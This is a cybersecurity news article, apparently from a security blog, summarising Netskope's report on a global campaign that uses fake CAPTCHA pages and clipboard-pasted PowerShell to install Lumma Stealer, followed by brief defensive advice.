Hackers Exploit Fake CAPTCHA to Spread Lumma Stealer Globally

Cybersecurity researchers have uncovered a sophisticated malware campaign that leverages fake CAPTCHA verification pages to distribute the Lumma Stealer information-stealing malware across multiple industries and countries worldwide.

Netskope Threat Labs discovered the global campaign targeting organizations in Argentina, Colombia, the United States, the Philippines, and other regions. The attack primarily impacts industries including healthcare, banking, marketing, and telecommunications, with the telecom sector experiencing the highest number of targeted organizations.

The intricate attack chain begins when victims visit a compromised website that redirects them to a deceptive CAPTCHA page. These fake verification pages are designed to trick users into executing a malicious command through the Windows Run prompt. By using the native mshta.exe binary, the attackers download and execute a harmful HTA file from a remote server.

Attack Chain

Researchers noted that the campaign represents an evolution of previous social engineering techniques. The fake CAPTCHA pages include a JavaScript snippet that silently copies a malicious PowerShell command to the user's clipboard. Users are then instructed to paste and execute the command, unknowingly initiating the malware infection process.

The Lumma Stealer, operating on a malware-as-a-service (MaaS) model, demonstrates remarkable flexibility in its delivery methods. Once executed, the malware can steal a wide range of sensitive information, including browser credentials, cryptocurrency wallet details, cookies, and other critical data from multiple browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.

Security experts highlight the campaign's sophisticated approach to evading detection. The malware employs multiple techniques to bypass security controls, including process hollowing and PowerShell one-liners. Additionally, the attackers use obfuscation methods to make analysis more challenging.

The infection process involves several complex stages. After the initial command execution, a series of PowerShell scripts are downloaded and executed, ultimately leading to the installation of the Lumma Stealer payload. Notably, the malware attempts to bypass Windows Antimalware Scan Interface (AMSI) protections, further complicating detection efforts.

Netskope researchers warn that this campaign represents a significant threat to organizations across various industries. The global nature of the attack and its ability to target multiple sectors make it particularly dangerous. Organizations are advised to implement robust security measures, including employee training on recognizing fake CAPTCHA pages and advanced threat detection systems.

As cybercriminals continue to develop more sophisticated social engineering techniques, security professionals must remain vigilant and adaptive. The Lumma Stealer campaign serves as a stark reminder of the evolving tactics used by threat actors to compromise systems and steal sensitive information.

Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this. 

You may also like these articles: Here are the 5 most contextually relevant blog posts: